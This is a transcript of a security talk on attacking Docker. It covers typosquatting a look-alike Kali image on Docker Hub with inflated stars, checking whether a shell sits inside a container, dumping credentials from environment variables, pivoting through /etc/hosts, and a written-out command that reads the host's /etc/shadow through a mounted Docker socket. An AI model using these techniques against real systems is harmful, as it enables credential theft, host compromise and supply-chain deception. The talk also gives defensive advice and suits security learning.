What about typosquatting? I mentioned Docker Hub: you can register any name there that's not already registered. Well, we used Kali Linux just now, so let's change the l to a 1. You can upload any image, backdoored or not, under any name you want — we're able to reuse kali-linux-docker in the same way we could reuse ubuntu; it'll just be namespaced with our username. You can just copy and paste their real profile and image details into the web interface and make your own — and that looks very much like theirs. Maybe the user won't notice the 1 instead of an l. You can't use Unicode, unfortunately, so you need to be a little creative with your naming, but here we have a pretty legit-looking version of Kali, if any of you would like to install it.

We can remove the image we built locally and pull it down from Docker Hub using the full path — in this case the ka1ilinux version of kali-linux-docker — and we can loop that, and we can create Docker Hub accounts and star that repository. So if someone searches for kali or kali linux — yes, you get the official one there at the top of 160,000 results, but look what I had on Docker Hub yesterday. You probably don't want to install that container. I mean, I didn't quite reach a million pulls or 360 stars, but it's totally conceivable you could do that and take the number-one position.

What about attacking Docker networks? Let's say you get a reverse shell on a box and it's running Docker — how do you know if you're inside a Docker container? There are a few things you can do. I don't fully understand all of them, but we'll run through some steps, and the slides will be available if you want to play around with this. Quite often there's a /.dockerenv file, which is a bit of a giveaway, so you can check whether that file is present on the machine. You can also check various proc settings: if /proc/1/cgroup contains "docker", guess what — you're inside Docker. You can take a look at /proc/1/sched, I think it is — it normally shows init or PID 1, and it shows something different if you're inside Docker. Docker also assigns hostnames to machines, so if you see a hostname of 12 hexadecimal characters, it could be a Docker-generated one.

Then, looting and pivoting: when you link containers, like we did with Postgres, Docker populates the /etc/hosts file for you. So if you've got access to one machine and you want to go looking for other machines, start with the hosts file — it'll tell you where to look, and it'll probably name things too: oh look, there's a Postgres server running at 172.17.0.2, and it was tagged msf-postgres — that's the one used for Metasploit.
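
The am-I-in-a-container checks, as one-liners:

    ls -la /.dockerenv           # present in most Docker containers
    grep docker /proc/1/cgroup   # cgroup paths mention docker inside a container
    cat /proc/1/sched            # PID 1 usually isn't init inside a container
    hostname                     # 12 hex characters suggests a Docker-generated name
    cat /etc/hosts               # linked containers get named entries to pivot to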

The way linking works — I mentioned we're able to override the username, which you can see in that second-last line, so that Metasploit can find the database — is that Docker pushes all of these into the linked containers as environment variables. So suddenly all these containers have environment variables holding other containers' usernames, potentially passwords, major and minor versions, ports, things like that. Within a Docker container, export can be your friend and dump tons of creds for zero effort. Obvious things: containers will likely share an IP range, so if you're in one machine, guess the range and nmap it — you'll likely find a lot of other machines.

What about running Docker inside Docker?

I mentioned there's a client and a server. We're not trying to get the Docker server running inside the Docker server inside the Docker server — but the client runs nearly anywhere, including inside Docker. Some tools, like docker-ssh, and some Jenkins builds, would have you mount the Docker socket — remember I said it listens on a Unix socket, not necessarily a port — into the container itself. So if you get access to run code on that machine, the container has access to call out to the host and run other containers.

So what if we decided to run BusyBox, mounted the host's /etc directory into it, and just cat the shadow file? Docker runs as root, so the output of this command is the host's /etc/shadow, on the command line of the box you've compromised.
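
As a sketch — this assumes the compromised container has a docker client and the host's socket mounted at the default path, and the mount point is a hypothetical name:

    # From inside the compromised container, start a second container with the
    # host's /etc mounted, and read the shadow file as root
    docker run --rm -v /etc:/host-etc busybox cat /host-etc/shadow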

You might also want to backdoor them and run an image — again, this runs on the host machine, outside the container you've compromised — and that can be any image: you can push one to Docker Hub and pull it down from there, so you don't even have to bother taking over and backdooring their existing images. You might want to look at their logs: maybe they're running some really super-secret software that you can't get running locally, and you don't want to pull it out of the system — you can just dump the logs from it. You could attach to containers, kill processes. So yes: mapping your Docker socket into a container literally exposes the host machine and all the other containers to huge risk. I would not recommend it.

Running Docker in production is not something people do very easily, so I'm not going to explain it — I'm just going to mention a few things. Service discovery is hard, especially with microservices: how does one container know where another one is? What if you're trying to run sharding and load balancing and things like that — how does everything know where to find stuff?

People don't have a great solution. You can't rely on IP addresses — Docker's going to reassign them — so people set up subdomains pointing at proxies. Look for those, enumerate them. Look for hardcoded and shared credentials, like we said with those env vars and any source code you find — you'll find a whole lot of stuff within a Docker ecosystem. And networking and firewalling is really, really hard, especially when you've got a host with its own IP, perhaps load balancers with a network range, and then the machines have their own network range, and things are bridging and things are on host networking. So what do people do?

They just open everything — "I don't know which network this must be open for, you know, let's just open it to the internet." So definitely scan ports, because everything's going to be connected to everything else in a really, really bad way.

As for attacking the stacks themselves: Kubernetes is very popular, and there's a great tool called Minikube which will get you up and running locally for a minimal amount of work. There's a very good blog that takes you through it. I would definitely recommend looking at Kubernetes — how people are using it, deploying it, and misusing it — because that's going to be one of the really popular ones. There's a bunch of other stuff, but I think we're quite short on time, so I'm just going to skip over it. There's a great way to do static analysis of Docker images: Docker have now started rating whether images have vulnerabilities or not, which is really great — if you know someone's using an image, go there and see if it has vulnerabilities, then go attack them. Or don't attack them. Using latest tags is generally bad practice; and you can run Docker not as root, so definitely go check that out if you're going to run Docker. And NIST have actually put together a container security guide, which is quite useful — a bit of a cheat sheet.

You can do things like mounting your GPU inside a Docker container, for mining or password cracking, which is cool. There's a boot2root you can do inside Docker to learn more about it. We mentioned Minikube. You can run the very first Unix, from 1972, inside Docker, to keep with the theme. Docker Compose lets you build really big, complex networks very, very easily. A recent study says 25% of Docker images have significant vulnerabilities — that's really interesting, because remember people are building on top of these layers, so if a layer is vulnerable, anything built on top of it likely is too. You can do access-point stuff — hosting access points and all the rest, mapping wireless into Docker — also really cool, plus some more security-auditing tooling.

And if you're interested in infosec, please come join us at 0xC0FFEE: we're on meetup.com, we have a website, we meet monthly, it's a super chilled get-together. If you want to know more about Docker, talk to the devops guys — they've got a meetup and an annual conference too, definitely check that out. I had a bunch of stickers printed and they really, really messed them up, so you're welcome to take some stickers, but you'll have to cut them out yourself. I do have another delivery arriving, which will probably be at the next 0xC0FFEE. And that's a wrap.

[Applause] Thank you guys. We're quite short on time, but are there any questions? Otherwise, chat to me afterwards — I think that might be better. Cool, thank you guys.